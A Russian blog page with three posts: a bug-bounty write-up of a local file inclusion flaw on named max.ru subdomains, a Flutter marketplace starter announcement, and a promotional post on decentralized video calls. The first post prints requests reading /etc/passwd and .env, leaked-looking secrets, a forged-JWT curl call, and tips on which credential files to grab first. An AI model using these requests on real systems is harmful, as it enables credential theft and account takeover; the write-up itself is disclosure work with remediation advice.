Dmitry Sorokin

🔍 От LFI до полной компрометации инфраструктуры — реальный кейс CVSS 9.0

2025-08-14T08:27:24.272Z

В рамках одного из багбаунти-исследований мне удалось обнаружить и успешно эксплуатировать уязвимость Local File Inclusion (LFI) на поддоменах *.max.ru.
Эта уязвимость дала возможность скачать конфигурационные файлы, получить критические секреты, подделать авторизационные токены и в итоге — полностью скомпрометировать API и инфраструктуру.

📺 Видео с PoC: YouTube
📂 Архив с доказательствами: Yandex Disk

1️⃣ Этап 1 — Рекогносцировка

Начав с классического рекона, я искал параметры, которые могут работать с файловыми путями.
На поддоменах:

business.max.ru
help.max.ru

нашёл параметр file, который явно подгружал файлы с сервера.

Тест-запрос:

GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*

Ответ (фрагмент):

root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Вывод: нет фильтрации, нет валидации, полный LFI.

2️⃣ Этап 2 — Поиск «золотых файлов»

После подтверждения LFI приоритет был очевиден — искать файлы, содержащие пароли, ключи и токены.

Файл Что хранит Чем опасен .env Переменные окружения JWT_SECRET, доступ к БД, API-ключи config.php Конфигурация PHP-приложения Подключение к БД .git/config Настройки git-репозитория URL и токены для приватных репо /proc/self/environ Переменные окружения процесса Runtime-секреты database.php Данные для подключения к БД Полный доступ к данным

Запрос на .env:

GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*

Ответ (усечён):

APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...

3️⃣ Этап 3 — Извлечение секретов

Из этих файлов были получены:

JWT_SECRET — ключ подписи токенов авторизации
DB_USER / DB_PASSWORD — доступ к продакшн-БД
GitHub Token — чтение и запись в приватные репозитории
API Keys — ключи к сторонним сервисам

4️⃣ Этап 4 — Эксплуатация JWT_SECRET

Секрет подписи JWT дал возможность:

Подделывать токены любого пользователя (включая админов)
Повторно использовать (token replay) уже действующие токены
Получать доступ к приватным эндпоинтам API без логина и пароля

PoC-запрос:

curl -H "Authorization: Bearer forged_admin_token" \
     https://api.oneme.ru/api/user

Результат:
Ответ с приватными данными пользователя без прохождения авторизации.

5️⃣ Этап 5 — Полная цепочка атаки

Сценарий выглядел так:

LFI на *.max.ru → доступ к .env
Извлечение JWT_SECRET и других секретов
Форжинг токена с правами администратора
Доступ к API → просмотр, изменение, удаление данных
GitHub Token → скачивание приватного кода
Возможный доступ к внутренним сервисам через API-ключи

6️⃣ MITRE ATT&CK

T1005 — Data from Local System
T1552.001 — Unsecured Credentials: Environment Variables
T1078 — Valid Accounts
T1550.003 — Use of Web Tokens

7️⃣ CVSS 3.1

Вектор:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Оценка: 9.0 (Critical)

AV:N — доступно по сети
AC:L — низкая сложность
PR:N — не требует авторизации
UI:N — не требует действий пользователя
S:C — затрагивает другие компоненты
C:H/I:H/A:H — критическое влияние на все параметры

8️⃣ Риски

Полная компрометация API
Утечка критических секретов
Доступ к приватным репозиториям
Возможные атаки на внутреннюю инфраструктуру

9️⃣ Рекомендации

Фильтрация параметров — белые списки путей, запрет абсолютных/относительных переходов.
Закрыть доступ к .env и config.php на уровне веб-сервера.
Не хранить продакшн-секреты в коде и окружении, доступном фронтенду.
Регулярная ротация ключей и токенов.
Мониторинг и алерты по аномальной активности.

10️⃣ Выводы для багхантеров

LFI часто недооценивают, но в реальности он может открыть все двери.
Первое, что проверяйте — .env, config.php, .git/.
Один секрет (например, JWT_SECRET) = полный контроль над системой.
Думайте цепочками атак, а не отдельными багами.

💡 Ключевая мысль:

Даже одна уязвимость низкого уровня, если её правильно развить, может обернуться катастрофой для бизнеса.

🚀 My Modus: Flutter + Dart стартер для интеграции с Wildberries, Ozon и La Moda

2025-08-09T15:19:52.604Z

Сегодня выигрывают те бренды, кто умеет продавать в нескольких каналах одновременно.
Мы разработали My Modus — готовое решение с открытым кодом, которое позволяет за несколько дней запустить приложение для управления продажами сразу на трёх крупнейших маркетплейсах: Wildberries, Ozon и La Moda.

📈 Зачем бренду интеграция с несколькими маркетплейсами

Онлайн-торговля давно вышла за рамки одного магазина.
Присутствие на нескольких площадках:

Расширяет аудиторию — разные маркетплейсы привлекают разные сегменты покупателей.
Увеличивает оборот — больше точек входа = больше продаж.
Снижает риски — падение продаж на одной платформе компенсируется другими.

Но у каждой платформы свой API, свой формат данных и требования. Мы решили эту проблему, создав единый мультиканальный e-commerce стартер на Flutter + Dart.

🛠 Технологии и архитектура

Фронтенд (Flutter):

Web + Mobile (iOS, Android) из одного кода
Мультиязычность (i18n)
Навигация через GoRouter
Адаптивный дизайн под любые устройства

Бэкенд (Dart Shelf):

Лёгкий и быстрый HTTP-сервер
PostgreSQL
JWT-аутентификация (dart_jsonwebtoken)
Модуль интеграции с API маркетплейсов

DevOps:

CI/CD через GitHub Actions
Автодеплой фронтенда на GitHub Pages
Автодеплой бэкенда на Render

🔌 Интеграция с маркетплейсами

1. Wildberries API

    Импорт каталога
    Обновление остатков и цен
    Управление заказами в реальном времени
    Пример: [Wildberries — My Modus](https://www.wildberries.ru/brands/311036101-my-modus)

2. Ozon API

    Автоматическая публикация товаров
    Синхронизация описаний и изображений
    Контроль логистики и доставки

3. La Moda API

    Загрузка fashion-коллекций
    Поддержка сезонных релизов
    Пример: [La Moda — My Modus](https://www.lamoda.ru/cb/355-34325/clothes-zhenskaya-odezhda-mymodusfashion)

💡 Почему Flutter + Dart

Один язык для фронтенда и бэкенда
Flutter даёт нативную скорость на iOS, Android и Web
Shelf — минималистичный, быстрый и легко расширяемый сервер
Меньше времени на разработку, проще поддержка

👥 Для кого этот проект

Fashion-бренды — подключение нескольких маркетплейсов из одного приложения
Агентства — быстрый запуск e-commerce решений для клиентов
Разработчики — готовый стартер, который можно дополнять и расширять

🚀 Как начать

Проект My Modus открыт на GitHub:
🔗 https://github.com/sorydima/MyModusFlutter

Можно:

Форкнуть репозиторий
Добавить новые маркетплейсы (AliExpress, Avito, Яндекс.Маркет)
Внести улучшения через Pull Request

Звонки через Катю 👽 и платформу REChain 🪐: шифрование, пространственный звук, режим рации и многое другое!

2022-07-26T12:45:21.050Z

REChain

Надеюсь, в 2022 году личные встречи станут намного проще, но потребность в видеозвонках по-прежнему существует, так что давайте посмотрим правде в глаза: они останутся здесь навсегда. Поэтому очень интересно представить первые в мире децентрализованные приложения для голосовой и видеоконференцсвязи, полностью работающие на базе Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network!

Видеозалы

Просто демо-образец iPad Pro в магазине Re-Store

Мы долго ждали этого момента, и, честно говоря, мы очень рады представить вам видеозалы. Это важный шаг на пути к более богатым видео (а вскоре и голосовым) комнатам!

Вот несколько способов его использования:

✅ Новый способ общения с группами людей для более непринужденных чатов в ваших сообществах 🥹

✅ Больше обсуждений водяного охладителя на работе 🤣

✅ Интересный способ пообщаться с друзьями 😎

Так что же можно сделать?

Полная свобода - перетаскивайте участников по кругу, чтобы упорядочить их точно так, как вам нравится, или дважды щелкните, чтобы увеличить масштаб. Супер веселый и интерактивный способ поставить ваших абонентов на место : D

Спотлайт - в качестве альтернативы, позвольте приложению помочь вам управлять вызовом в зависимости от того, кто в данный момент говорит!

Фулл саппорт - мессенджеры Катя 👽 и REChain 🪐 бесплатны и доступны для загрузки на Android, iOS, macOS, Windows, Linux, Chrome OS, Google Wear OS, некоторые модели Smart TV, часть умных девайсов IoT, а также на любом устройстве в любом браузере в виде PWA веб-приложения! (Катя пока недоступна для браузеров, однако PWA-приложение Кати готовится к релизу)

Вызов по ссылке - просто поделитесь ссылкой и вперед!

Гостевые конференции - нет необходимости регистрировать учетную запись, чтобы присоединиться к конференции!

Создание скриншотов - несколько пользователей могут делиться ими одновременно!

Встроенная матричная конференц-связь (MSC3401) - полностью децентрализована; общайтесь с кем угодно в любом месте сети Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network без какой-либо единой точки отказа, контроля или сбоя!

Как это работает?

Катя

Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network - это головная реализация собственной голосовой/видеоконференцсвязи на основе матрицы, как определено в предложении по изменению спецификации матрицы MSC3401. Это пошаговое изменение в том, как работает VoIP в сети - расширение нашей матрицы VoIP/видеозвонков 1:1 для поддержки нескольких участников и значительное ускорение настройки вызова за счет переключения transport layers. Если вы хотите знать, что происходит под капотом, ознакомьтесь с докладом Мэтью на CommCon 2021 о распространении вызовов E2EE на многопоточность, чтобы узнать кровавые подробности! 🤓 🤣

Мы будем рады услышать от вас о том, как вы использовали наши приложения, что вам нравится, какие у вас были проблемы и функции, которые вы хотели бы видеть в будущем!

С уважением,

Дмитрий Сорокин,

403 Gone

REChain, Inc

Katya AI, Systems

Katya, Inc

Katya Systems, LLC

REChain Network Solutions